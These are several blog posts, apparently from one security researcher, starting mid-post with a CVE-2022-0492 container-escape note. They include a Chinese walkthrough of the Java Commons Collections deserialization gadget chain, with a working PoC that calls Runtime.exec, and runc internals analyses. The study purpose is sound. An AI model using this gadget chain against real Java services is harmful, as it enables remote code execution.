    block       class       devices     fs          kernel      power
    bus         dev         firmware    hypervisor  module

I do this test in 5.4.1 successfully but failed in 5.11 maybe there are more protections. Here we uses ‘ro’ as the runc mount sysfs readonly in container.

Summary

Just as Yuval Avrahami point out, CVE-2022-0492 is about ‘creating new user & cgroup namespace’ and do the release_agent escape. The kernel security mechanism behind this CVE is quite interesing.

Reference

I mostly read Yuval Avrahami post and thanks him to point the key understanding of CVE-2022-0492.

New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? Rootless containers don’t work from unprivileged non-root Docker container (operation not permitted for mounting procfs)

Java反序列化漏洞研究前序: Transformer、动态代理与注解

2022-01-30T00:00:00+00:00

今年给自己定了一个研究清楚Java反序列化漏洞的KPI，反序列化漏洞本身原理并不复杂，但是网上的资料都不甚满意，大部分都是只是知道怎么用别人的PoC，并没有对具体的原理做深入的分析和思考，特别是Commons Collections一系列的分析，非常不满意，比如反序列化为什么需要有自己的readObject、为什么AnnotationInvocationHandler的第一个参数为Override.class和Target.class都可以。最终我决定自己深入分析各个知识点。最主要是分析动态代理和注解，但是为了完整第一部分会分析Transformer。

PoC

首先，先放上最基本的Commons Collections的PoC，如下代码会直接弹出计算器。

    public static void main(String[] args) throws Exception {
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
        };
        Transformer chain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        innerMap.put("value","test");
        Map outerMap = TransformedMap.decorate(innerMap, null, chain);

        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);

        ctor.setAccessible(true);

        Object instance = ctor.newInstance(Retention.class ,outerMap);


        //序列化
        FileOutputStream fos = new FileOutputStream("cc1");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(instance);
        oos.close();
        //反序列化
        FileInputStream fis = new FileInputStream("cc1");
        ObjectInputStream ois = new ObjectInputStream(fis);
        ois.readObject();
        ois.close();
    }

Transformer

Commons Collections里面提供了一个强大的接口叫做Transformer，顾名思义，这个接口用来实现一种转换，其中的InvokerTransformer特别重要，它会调用指定的函数进行转换，下面是使用该Transformer的一个例子。

    public class Main {

        public static void main(String[] args) {
            HashMap<String, String> a = new HashMap<>();

            Transformer keyTrans = new InvokerTransformer("concat", new Class[]{String.class}, new Object[]{"A"});
            Transformer valueTrans = new InvokerTransformer("toUpperCase", new Class[]{}, new Object[]{});

            Map b = TransformedMap.decorate(a, keyTrans, valueTrans);
            b.put("a", "aaa");
            b.put("b", "bbb");
            b.put("c", "ccc");

            Iterator it = b.entrySet().iterator();
            while(it.hasNext()) {
                Map.Entry entry = (Map.Entry)it.next();
                System.out.println("key="+entry.getKey()+",value="+entry.getValue());
            }
        }
    }

输出如下：

    key=cA,value=CCC
    key=bA,value=BBB
    key=aA,value=AAA

InvokerTransformer类的构造函数有三个参数，第一个是方法名，第二个是该方法的参数类型，第三个是传递给该方法的参数。TransformedMap.decorate的第一个参数是需要修饰的map，第二个是key所使用的Transformer，第三个是value所使用的Transformer。经过如此配置之后，当我们从被”decorate”之后的map(b)添加元素的时候，每一个添加的元素都会被经过“修饰”之后放到map(a)中去。

直接看TransformedMap的源码：

    public Object put(Object key, Object value) {
        key = this.transformKey(key);
        value = this.transformValue(value);
        return this.getMap().put(key, value);
    }

    protected Object transformKey(Object object) {
        return this.keyTransformer == null ? object : this.keyTransformer.transform(object);
    }

    protected Object transformValue(Object object) {
        return this.valueTransformer == null ? object : this.valueTransformer.transform(object);
    }

接着看看InvokerTransformer类的transform实现：

    public Object transform(Object input) {
        if (input == null) {
            return null;
        } else {
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            } catch (NoSuchMethodException var5) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException var6) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException var7) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
            }
        }
    }

这段代码就是Commons Collections的核心的，本质上就是调用了参数input对应的类型的任意method方法，iMethodName、iParamTypes以及iArgs是InvokerTransformer在构造时候提供的参数。

回到PoC，其中我们使用了ChainedTransformer，代码如下：

        Transformer chain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        innerMap.put("value","test");
        Map outerMap = TransformedMap.decorate(innerMap, null, chain);

ChainedTransformer的transform实现如下：

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

其本质是将iTransformers（通过构造ChainedTransformer指定）逐个调用transform，前一个的返回结果作为后一个的参数。结合transformers的定义：

        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class}, new Class[]{Runtime.class, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
        };

ConstantTransformer的transform仅为返回参数对应的Object，对于使用transformers来进行装饰的map，其transform的过程如下：

Runtime.class表示class Runtime，第一个链返回自身
Runtime.class本身是一个class Class的实例，并且Class是由getMethod方法的，所以在第一个InvokerTransformer会中在Runtime.class上调用getMethod参数设置为getRuntime，这样，获得了一个Method对象(getRuntime)
在第二个InvokerTransformer会调用getRuntime这个Method的invoke方法，这样返回了一个Runtime对象
在第三个InvokerTransformer会调用Runtime的exec函数，并且传递参数calc.exe，这样就达到了执行代码的目的。

这个过程本质上如图所示。

        Object obj0  = Runtime.class;
        Class cls1 = obj0.getClass();
        Method method1 = cls1.getMethod("getMethod", new Class[]{String.class, Class[].class});
        Object obj1 = method1.invoke(obj0, "getRuntime", new Class[0]);

        Class cls2 = obj1.getClass();
        Method method2 = cls2.getMethod("invoke", new Class[]{Object.class, Object[].class});
        Object obj2 = method2.invoke( obj1, null, new Object[0]);

        Class cls3 = obj2.getClass();
        Method method3 = cls3.getMethod("exec", new Class[]{String.class});
        Object obj3 = method3.invoke(obj2, "calc.exe");

下面是调试结果：

动态代理

动态代理的例子网上很多，随便找一个例子来分析。

    interface HelloInterface {
        void sayHello();
    }

    class Hello implements HelloInterface{
        @Override
        public void sayHello() {
            System.out.println("Hello world!");
        }
    }

    class ProxyHandler implements InvocationHandler {
        private Object object;
        public ProxyHandler(Object object){
            this.object = object;
        }
        @Override
        public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
            System.out.println("Before invoke "  + method.getName());
            method.invoke(object, args);
            System.out.println("After invoke " + method.getName());
            return null;
        }
    }


    public class Main {

        public static void main(String[] args) throws Exception {
            System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");

            HelloInterface hello = new Hello();

            InvocationHandler handler = new ProxyHandler(hello);

            HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);

            proxyHello.sayHello();

            System.out.println(proxyHello);

        }
    }

输出如下，可见通过proxyHello对象调用的函数都会经过我们的ProxyHandler代理。

    Before invoke sayHello
    Hello world!
    After invoke sayHello
    Before invoke toString
    After invoke toString
    null

通过调试可知，此时proxyHello本质上是一个实现了HelloInterface的$Proxy0类型对象，$Proxy0是内部生成的。

在目录下找到该文件查看内容如下，可见该自动生成的Proxy类实现了HelloInterface，其成员函数包含HelloInterface的接口sayHello以及所有Object接口的几个基本函数，其实现均为调用了super.h.invoke函数，这个函数就是代理handler(这里的ProxyHandler)需要实现的函数。

    public final class $Proxy0 extends Proxy implements HelloInterface {
        private static Method m3;
        private static Method m1;
        private static Method m0;
        private static Method m2;

        public $Proxy0(InvocationHandler var1) throws  {
            super(var1);
        }

        public final void sayHello() throws  {
            try {
                super.h.invoke(this, m3, (Object[])null);
            } catch (RuntimeException | Error var2) {
                throw var2;
            } catch (Throwable var3) {
                throw new UndeclaredThrowableException(var3);
            }
        }

        public final boolean equals(Object var1) throws  {
            try {
                return (Boolean)super.h.invoke(this, m1, new Object[]{var1});
            } catch (RuntimeException | Error var3) {
                throw var3;
            } catch (Throwable var4) {
                throw new UndeclaredThrowableException(var4);
            }
        }

        public final int hashCode() throws  {
            try {
                return (Integer)super.h.invoke(this, m0, (Object[])null);
            } catch (RuntimeException | Error var2) {
                throw var2;
            } catch (Throwable var3) {
                throw new UndeclaredThrowableException(var3);
            }
        }

        public final String toString() throws  {
            try {
                return (String)super.h.invoke(this, m2, (Object[])null);
            } catch (RuntimeException | Error var2) {
                throw var2;
            } catch (Throwable var3) {
                throw new UndeclaredThrowableException(var3);
            }
        }

        static {
            try {
                m3 = Class.forName("test.com.company.HelloInterface").getMethod("sayHello");
                m1 = Class.forName("java.lang.Object").getMethod("equals", Class.forName("java.lang.Object"));
                m0 = Class.forName("java.lang.Object").getMethod("hashCode");
                m2 = Class.forName("java.lang.Object").getMethod("toString");
            } catch (NoSuchMethodException var2) {
                throw new NoSuchMethodError(var2.getMessage());
            } catch (ClassNotFoundException var3) {
                throw new NoClassDefFoundError(var3.getMessage());
            }
        }
    }

回到例子中这一句：

    (HelloInterface) Proxy.newProxyInstance(hello.getClass().getClassLoader(), hello.getClass().getInterfaces(), handler);

可以看到newProxyInstance的参数，第一个是加载器，第二个是interfaces，第三个是处理handler，这里可以看到代理其实是绑定到interface的，跟具体实现Hello是没有关系的。所以我们的例子可以简化为如下：

    interface HelloInterface {
        void sayHello();
    }


    class ProxyHandler implements InvocationHandler {
        @Override
        public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
            System.out.println("Before invoke "  + method.getName());
            System.out.println(method.getName()+" is called");
            System.out.println("After invoke " + method.getName());
            return "test";
        }
    }

    public class Main {

        public static void main(String[] args) throws Exception {
            System.getProperties().setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");

            InvocationHandler handler = new ProxyHandler();

            HelloInterface proxyHello = (HelloInterface) Proxy.newProxyInstance(HelloInterface.class.getClassLoader(), new Class[]{HelloInterface.class}, handler);

            proxyHello.sayHello();

            System.out.println(proxyHello);

        }
    }

输出如下：

    Before invoke sayHello
    sayHello is called
    After invoke sayHello
    Before invoke toString
    toString is called
    After invoke toString
    test

这个时候再去看生成的$Proxy0.class，内容其实是一样的。所以本质上，Proxy是为需要代理的接口生成了一个类，返回该的对象，用户可以通过该对象调用对应的接口，最终会调用到用户指定的handler中去。

Java注解实现

本质上理解Java注解是为了理解Commons Collections中搞的AnnotationInvocationHandler的用法。 Java的注解是代码级别的注释，之所以说是注释是因为注解本身并不影响被注解代码的运行表现，之所以说是代码层面的，是因为注解也是会生成代码的，可以在运行时后获取注解，做一些判断、检查类的工作，比如Java编译时候使用。注解分为普通注解和元注解，普通注解比如@Override、@Deprecated用来作用在代码上，元注解比如@Retention、@Target等用来作用在程序员自定义的注解上。下面的代码，我们自己定义了两个注解，一个作用在类上，一个作用在方法上，并且自定义的Person类使用了这两个注解。

    @Retention(RetentionPolicy.RUNTIME)
    @Target(ElementType.TYPE)
    @interface AnnType {
        String msg() default "type";
    }

    @Retention(RetentionPolicy.RUNTIME)
    @Target(ElementType.METHOD)
    @interface AnnMethod {
        String msg() default "method";
    }


    @AnnType(msg="xaa")
    class Person {
        String name;
        int age;
        public Person() {
            name = "aa";
            age = 12;
        }
        public void print() {
            System.out.println(name);
        }

        @AnnMethod
        public String to_string() {
            return "Person{" +
                    "name='" + name + '\'' +
                    '}';
        }
    }

    public class Main {
        public static void main(String[] args) throws  Exception {
            System.setProperty("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
            System.out.println(new Person().to_string());
        }
    }

输出如下：

    Person{name='aa'}

可以看到注解并没有影响到代码功能。

每一个注解实现为一个interface

下面的代码：

    Class<?> annTypecls = AnnType.class;
    Class<?>[] panntype = annTypecls.getInterfaces();

注解的使用

看看注解的使用：

    AnnType annType = Person.class.getAnnotation(AnnType.class);
    String annTypeValue = annType.msg();

    AnnMethod annMethod = Person.class.getMethod("to_string", new Class[0]).getAnnotation(AnnMethod.class);
    String annMethodValue = annMethod.msg();

    System.out.println("annTypevalue = " + annTypeValue+", annMethodValue = " + annMethodValue);

输出：

    annTypevalue = xaa, annMethodValue = method

对比例子代码，可以看到Class的注解为我们制定的值xaa，Method的注解为默认值method。我们已经知道注解是一个interface，那么Class/Method.getAnnotation返回必定是一个实现了这个interface的类。通过调试可以看到getAnnotation返回的是一个代理类型的对象。这就是我们在第二节中说的动态代理，并且其handler为AnnotationInvocationHandler。

Annotation实现

这一节跟随

    Person.class.getAnnotation(AnnType.class);

研究Annotation的实现。

Class对象有一个annotations成员，保存了类型的注解信息，annotations是一个Map，key为注解Class，value为实现了Annotation的动态代理类。getAnnotation实现如下，initAnnotationsIfNecessary用来初始化annotations，仅会在第一次调用时执行实际工作。当annotations有值时，直接通过annotationClass查询Map返回即可。

    Map<Class<? extends Annotation>, Annotation> annotations;

    public <A extends Annotation> A getAnnotation(Class<A> annotationClass) {
        if (annotationClass == null)
            throw new NullPointerException();

        initAnnotationsIfNecessary();
        return (A) annotations.get(annotationClass);
    }

initAnnotationsIfNecessary的实现如下：

    private synchronized void initAnnotationsIfNecessary() {
        clearAnnotationCachesOnClassRedefinition();
        if (annotations != null)
            return;
        declaredAnnotations = AnnotationParser.parseAnnotations(
            getRawAnnotations(), getConstantPool(), this);
        Class<?> superClass = getSuperclass();
        if (superClass == null) {
            annotations = declaredAnnotations;
        } else {
            annotations = new HashMap<>();
            superClass.initAnnotationsIfNecessary();
            for (Map.Entry<Class<? extends Annotation>, Annotation> e : superClass.annotations.entrySet()) {
                Class<? extends Annotation> annotationClass = e.getKey();
                if (AnnotationType.getInstance(annotationClass).isInherited())
                    annotations.put(annotationClass, e.getValue());
            }
            annotations.putAll(declaredAnnotations);
        }
    }

从上述代码可知，Class类其实还有一个成员declaredAnnotations，这个成员保存的是Class自身的注解声明，如果没有父类，那么annotations和declaredAnnotations保存的是一样的数据，如果有父类，initAnnotationsIfNecessary还会将父类的注解放到annotations中。重点来到了如下调用：

    declaredAnnotations = AnnotationParser.parseAnnotations(
        getRawAnnotations(), getConstantPool(), this);

一路跟进，经过parseAnnotations->parseAnnotations2->parseAnnotation2，最后一个函数完成实际的注解解析工作。

    private static Annotation parseAnnotation2(ByteBuffer var0, ConstantPool var1, Class<?> var2, boolean var3, Class<? extends Annotation>[] var4) {
            int var5 = var0.getShort() & '\uffff';
            Class var6 = null;
            String var7 = "[unknown]";

            try {
                try {
                    var7 = var1.getUTF8At(var5);//var7为类名 Ltest/com/company/AnnType;
                    var6 = parseSig(var7, var2);//var6为 interface test.com.company.AnnType
                } catch (IllegalArgumentException var18) {
                    var6 = var1.getClassAt(var5);
                }
            }...
            if (var4 != null && !contains(var4, var6)) {
                skipAnnotation(var0, false);
                return null;
            } else {
                AnnotationType var8 = null;

                try {
                    var8 = AnnotationType.getInstance(var6);//var8为AnnotationType
                } catch (IllegalArgumentException var17) {
                    skipAnnotation(var0, false);
                    return null;
                }

                Map var9 = var8.memberTypes();
                LinkedHashMap var10 = new LinkedHashMap(var8.memberDefaults());
                int var11 = var0.getShort() & '\uffff';

                for(int var12 = 0; var12 < var11; ++var12) {
                    int var13 = var0.getShort() & '\uffff';
                    String var14 = var1.getUTF8At(var13);
                    Class var15 = (Class)var9.get(var14);
                    if (var15 == null) {
                        skipMemberValue(var0);
                    } else {
                        Object var16 = parseMemberValue(var15, var0, var1, var2);
                        if (var16 instanceof AnnotationTypeMismatchExceptionProxy) {
                            ((AnnotationTypeMismatchExceptionProxy)var16).setMember((Method)var8.members().get(var14));
                        }

                        var10.put(var14, var16);
                    }
                }

                return annotationForMap(var6, var10);
            }
        }

前面提到注解是一个继承自Annotation的interface，这里新出现了AnnotationType，这个是类中存放的是注解的信息。这里简单介绍一下该结构体，其中三个最主要的成为如下三个Map。

    private final Map<String, Class<?>> memberTypes;
    private final Map<String, Object> memberDefaults;
    private final Map<String, Method> members;

第一个memberTypes存放的是名字到Class的对应关系，第二个memberDefaults存放的是名字到默认值的对应关系，第三个members存放的是名字到方法的对应关系。以我们例子的AnnType注解为例，成员如下：

AnnotationType是通过AnnotationType.getInstance创建的，parseAnnotation2调用了该函数。parseAnnotation2最后的for循环是将注解的默认值替换为实际值。比如AnnType的默认值是type，但是在Person中被设置为了xaa。

parseAnnotation2的最后来到了annotationForMap。

    public static Annotation annotationForMap(Class<? extends Annotation> var0, Map<String, Object> var1) {
        return (Annotation)Proxy.newProxyInstance(var0.getClassLoader(), new Class[]{var0}, new AnnotationInvocationHandler(var0, var1));
    }

annotationForMap创建了动态代理，这里的var0参数是AnnType的Class对象，var1是一个LinkedHashMap，里面保存了各个注解名称与值。比如Person类的注解内容”msg”->”xaa”。handler为AnnotationInvocationHandler。

    AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
        Class[] var3 = var1.getInterfaces();
        if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
            this.type = var1;
            this.memberValues = var2;
        } else {
            throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
        }
    }

构造函数将Annotation的type信息和各个注解key-value保存到了memberValues中。

当测试例子中调用annMethod.msg()时，会调用到代理类中的invoke，代理类会调用handler的invoke，AnnotationInvocationHandler的invoke如下。

        public Object invoke(Object var1, Method var2, Object[] var3) {
            String var4 = var2.getName();
            Class[] var5 = var2.getParameterTypes();
            if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
                return this.equalsImpl(var3[0]);
            } else if (var5.length != 0) {
                throw new AssertionError("Too many parameters for an annotation method");
            } else {
                byte var7 = -1;
                switch(var4.hashCode()) {
                case -1776922004:
                    if (var4.equals("toString")) {
                        var7 = 0;
                    }
                    break;
                case 147696667:
                    if (var4.equals("hashCode")) {
                        var7 = 1;
                    }
                    break;
                case 1444986633:
                    if (var4.equals("annotationType")) {
                        var7 = 2;
                    }
                }

                switch(var7) {
                case 0:
                    return this.toStringImpl();
                case 1:
                    return this.hashCodeImpl();
                case 2:
                    return this.type;
                default:
                    Object var6 = this.memberValues.get(var4);
                    if (var6 == null) {
                        throw new IncompleteAnnotationException(this.type, var4);
                    } else if (var6 instanceof ExceptionProxy) {
                        throw ((ExceptionProxy)var6).generateException();
                    } else {
                        if (var6.getClass().isArray() && Array.getLength(var6) != 0) {
                            var6 = this.cloneArray(var6);
                        }

                        return var6;
                    }
                }
            }
        }

可以看到对于非内置的函数调用，通过var4得到方法名，接着在this.memberValues这个Map中查找，进而得到value返回。

PoC分析

在PoC中，本质上写入文件的是AnnotationInvocationHandler的一个实例，其中参数是Retention.class和一个TransformedMap。正向思考，这里意思是构建一个处理Retention注解的AnnotationInvocationHandler，并且其对应的Map为TransformedMap。当然这里的TransformedMap的状态，比如transformers也会被写入到文件中。

当进行反序列化时，AnnotationInvocationHandler有自己的readObject，该函数会被调用。

        private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
            var1.defaultReadObject();
            AnnotationType var2 = null;

            try {
                var2 = AnnotationType.getInstance(this.type);
            } catch (IllegalArgumentException var9) {
                throw new InvalidObjectException("Non-annotation type in annotation serial stream");
            }

            Map var3 = var2.memberTypes();
            Iterator var4 = this.memberValues.entrySet().iterator();

            while(var4.hasNext()) {
                Entry var5 = (Entry)var4.next();
                String var6 = (String)var5.getKey();
                Class var7 = (Class)var3.get(var6);
                if (var7 != null) {
                    Object var8 = var5.getValue();
                    if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                        var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                    }
                }
            }

        }

var1.defaultReadObject首先调用默认的反序列化函数，这样就将AnnotationInvocationHandler准备好了。

接下来得到Retention注解的AnnotationType结构体。

Retention是一个元注解，所以这里的AnnotationType是根据如下定义得到的。

    @Documented
    @Retention(RetentionPolicy.RUNTIME)
    @Target(ElementType.ANNOTATION_TYPE)
    public @interface Retention {
        RetentionPolicy value();
    }

现在，var3这个Map保存的是正儿八经的Retention注解的成员类型信息，其中key为”value”, value为”RetentionPolicy”这是一个自定义的类。接下来对我们反序列化出来的this.memberValues的Map进行循环。本质上判断反序列化出来的value的类型是不是跟生成的AnnotationType的memberTypes能对得上。由于我们在序列化构建AnnotationInvocationHandler指定的Map里面放了”value”=”test”, value的类型是String，而实际上根据AnnotationType的指示，这里需要的是一个RetentionPolicy，所以最终会调用var5.setValue，最终会调用到TransformedMap的checkSetValue函数。从而调用到了transform函数。

    protected Object checkSetValue(Object value) {
        return this.valueTransformer.transform(value);
    }

综上，AnnotationInvocationHandler的readObject其实本质上是在做一个校验，如果过不了这个判断，那么会调用Map的设置函数，从而触发了Transformer的transform的函数，进而执行了任意代码。

总结

本文通过一个Commons Collections的PoC详细讲解了涉及到的对于初学者比较难理解的概念，主要包括动态代理和注解实现。通过本文的分析，应该能够理解AnnotationInvocationHandler相关的Commons Collections的利用链。从本文的分析也可以看出，Commons Collections的利用还是比较复杂的，并不太适合初学者，其实Fastjson反序列化倒是没有这么复杂。

runc internals, part 3: runc double clone

2021-12-28T00:00:00+00:00

Now that we have analyzed the general process of ‘runc create’ and know that the ‘runc create’ will execute ‘runc init’ parent process, the parent process will clone child process, and the child process will clone a grandchild process, and this grandchild process will execute the user defined process.

Once I decide to draw a pic of these four process’ relation. But I found a detail pic here. I just reference it here.

So let’s see these process’ work.

parent

This is runc:[0:PARENT].

Got the config from runc create process. This is done by

  nl_parse(pipenum, &config); //corresponding runc create code :io.Copy(p.messageSockPair.parent, p.bootstrapData)

Create two socketpair ‘sync_child_pipe’ and ‘sync_grandchild_pipe’ to sync with the child and grandchild.
Clone child process
Update the uid/gid mapping for child process
Receive the pid of children and grand children, and send these two to runc create process. So runc create can send config data to the grandchild.
Wait the grandchild to run

child

This is runc:[1:CHILD].

Join the namespace specified in the config.json
Ask the parent process to set the uid/gid mapping
unshare the namespace specified in config.json
Clone grandchild process
Send the pid of grandchild to parent

grandchild

This is runc:[2:INIT].

Now this process is in the new pid namespace.
Notify the parent process we are ready
factory.StartInitialization()
Config the environment specified in config.json and execute the process

summary

The first clone is to let the parent to set the uid/gid mapping. The second clone is to make the pid namespace take effect. After these double clone, the child process is totally in the desirable new environment.

reference

runc源码分析 runc nsenter 源码阅读

runc internals, part 2: create and run a container

2021-12-23T00:00:00+00:00

runc create analysis

We can create a container by run ‘runc create’, for not consider the tty/console, let’s change the default ‘config.json.

    "terminal": false,
    ...
    "args": [
            "sleep",
            "1000"
    ],

I list the important function call in the following.

startContainer –>setupSpec –>createContainer –>specconv.CreateLibcontainerConfig –>loadFactory –>factory.Create –>manager.New

--runner.run
        -->newProcess
        -->setupIO
        -->r.container.Start
                -->c.createExecFifo
                -->c.start
                        -->c.newParentProcess
                                -->c.commandTemplate
                                -->c.newInitProcess

                        -->parent.start
                                -->p.cmd.Start
                                -->p.sendConfig

The create process contains three steps in general which I have split them with empty line.

The first is the prepare work, the code is mostly in ‘utils_linux.go’. It contains following:

load spec from config.json
create a container object using factory pattern
create a runner and call the runner.run

The second is the runner.run process, the code is mostly in ‘container_linux.go’. It contains following:

Call the container.Start, thus go to the libcontainer layer
Call internal function c.start, this function create a newParentProcess
Call parent.start

The third is the parent.start(), the coe is in ‘init.go’ and ‘nsenter.c’. It contains following:

p.cmd.Start, this will create a child process which is ‘runc init’.
The runc init process will do double clone and finally run the process defined in config.json, this is an interesting process, I will use a separate post to analysis it.

Ok, let’s dig into more of the code.

prepare

Following pic show the prepare work.

‘startContainer’ calls setupSpec to get the spec from config.json. Then call ‘createContainer’ to get a new container object.

    func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
            if err := revisePidFile(context); err != nil {
                    return -1, err
            }
            spec, err := setupSpec(context)
            ...
            container, err := createContainer(context, id, spec)
            ...
    }

Linux has no built-in container concept. libcontainer use a ‘linuxContainer’ to represent a container concept.

    type linuxContainer struct {
            id                   string
            root                 string
            config               *configs.Config
            cgroupManager        cgroups.Manager
            intelRdtManager      intelrdt.Manager
            initPath             string
            initArgs             []string
            initProcess          parentProcess
            initProcessStartTime uint64
            criuPath             string
            newuidmapPath        string
            newgidmapPath        string
            m                    sync.Mutex
            criuVersion          int
            state                containerState
            created              time.Time
            fifo                 *os.File
    }

As we can see, there are several container-related fields. The ‘initPath’ specify the init program for spawning a container. ‘initProcess’ is the process represent of the init program.

A linuxContainer is created by a ‘LinuxFactory’. The createContainer can be easily understood. It first create a libcontainer config and then create LinuxFactory(by calling loadFactory) and finally create a linuxContainer(by calling factory.Create).

    func createContainer(context *cli.Context, id string, spec *specs.Spec) (libcontainer.Container, error) {
            rootlessCg, err := shouldUseRootlessCgroupManager(context)
            if err != nil {
                    return nil, err
            }
            config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
                    CgroupName:       id,
                    UseSystemdCgroup: context.GlobalBool("systemd-cgroup"),
                    NoPivotRoot:      context.Bool("no-pivot"),
                    NoNewKeyring:     context.Bool("no-new-keyring"),
                    Spec:             spec,
                    RootlessEUID:     os.Geteuid() != 0,
                    RootlessCgroups:  rootlessCg,
            })
            if err != nil {
                    return nil, err
            }

            factory, err := loadFactory(context)
            if err != nil {
                    return nil, err
            }
            return factory.Create(id, config)
    }

‘loadFactory’ will call ‘libcontainer.New’ to create a new Factory. As we can see the ‘InitPath’ is set to the runc program it self and the ‘InitArgs’ is set to ‘init’. This means ‘runc init’.

    func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
            ...
            l := &LinuxFactory{
                    Root:      root,
                    InitPath:  "/proc/self/exe",
                    InitArgs:  []string{os.Args[0], "init"},
                    Validator: validate.New(),
                    CriuPath:  "criu",
            }
            ...
    }

After create the factory, ‘createContainer’ call ‘factory.Create’.

    func (l *LinuxFactory) Create(id string, config *configs.Config) (Container, error) {
            ...
            cm, err := manager.New(config.Cgroups)
            ...
            if err := os.MkdirAll(containerRoot, 0o711); err != nil {
                    return nil, err
            }
            if err := os.Chown(containerRoot, unix.Geteuid(), unix.Getegid()); err != nil {
                    return nil, err
            }
            c := &linuxContainer{
                    id:            id,
                    root:          containerRoot,
                    config:        config,
                    initPath:      l.InitPath,
                    initArgs:      l.InitArgs,
                    criuPath:      l.CriuPath,
                    newuidmapPath: l.NewuidmapPath,
                    newgidmapPath: l.NewgidmapPath,
                    cgroupManager: cm,
            }
            ...
            c.state = &stoppedState{c: c}
            return c, nil
    }

Notice, we can see ‘initPath’ and ‘initArgs’ of linuxContainer is assigned from the LinuxFactory. Also the ‘factory.Create’ create a directory as the container root. After creating the container, ‘startContainer’ create a ‘runner’ and calls ‘r.run’.

    func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
            ...
            r := &runner{
                    enableSubreaper: !context.Bool("no-subreaper"),
                    shouldDestroy:   !context.Bool("keep"),
                    container:       container,
                    listenFDs:       listenFDs,
                    notifySocket:    notifySocket,
                    consoleSocket:   context.String("console-socket"),
                    detach:          context.Bool("detach"),
                    pidFile:         context.String("pid-file"),
                    preserveFDs:     context.Int("preserve-fds"),
                    action:          action,
                    criuOpts:        criuOpts,
                    init:            true,
            }
            return r.run(spec.Process)
    }

The runner object is just as its name indicates, a runner. It allows the user to run a process in a container. The ‘runner’ contains the ‘container’ and also some other control options. And the ‘action’ can ‘CT_ACT_CREATE’ means just create and ‘CT_ACT_RUN’ means create and run. The ‘init’ decides whether we should do the initialization work. This can be false if we exec a new process in an exist container. The ‘r.run’s parameter is ‘spec.Process’ which is the process we need to execute in config.json.

Let’s go to the ‘r.run’, ‘newProcess’ create a new ‘libcontainer.Process’ object and ‘setupIO’ initialization the process’s IO.

    func (r *runner) run(config *specs.Process) (int, error) {
            var err error
            ...
            process, err := newProcess(*config)
            ...
            // Populate the fields that come from runner.
            process.Init = r.init
            ...
            tty, err := setupIO(process, rootuid, rootgid, config.Terminal, detach, r.consoleSocket)
            if err != nil {
                    return -1, err
            }
            defer tty.Close()

            switch r.action {
            case CT_ACT_CREATE:
                    err = r.container.Start(process)
            case CT_ACT_RESTORE:
                    err = r.container.Restore(process, r.criuOpts)
            case CT_ACT_RUN:
                    err = r.container.Run(process)
            default:
                    panic("Unknown action")
            }
            ...
            return status, err
    }

Finally, according the ‘r.action’ we can corresponding function, in the create case the ‘r.container.Start’ will be called.

container start

Following pic show the container start process.

    func (c *linuxContainer) Start(process *Process) error {
            c.m.Lock()
            defer c.m.Unlock()
            if c.config.Cgroups.Resources.SkipDevices {
                    return errors.New("can't start container with SkipDevices set")
            }
            if process.Init {
                    if err := c.createExecFifo(); err != nil {
                            return err
                    }
            }
            if err := c.start(process); err != nil {
                    if process.Init {
                            c.deleteExecFifo()
                    }
                    return err
            }
            return nil
    }

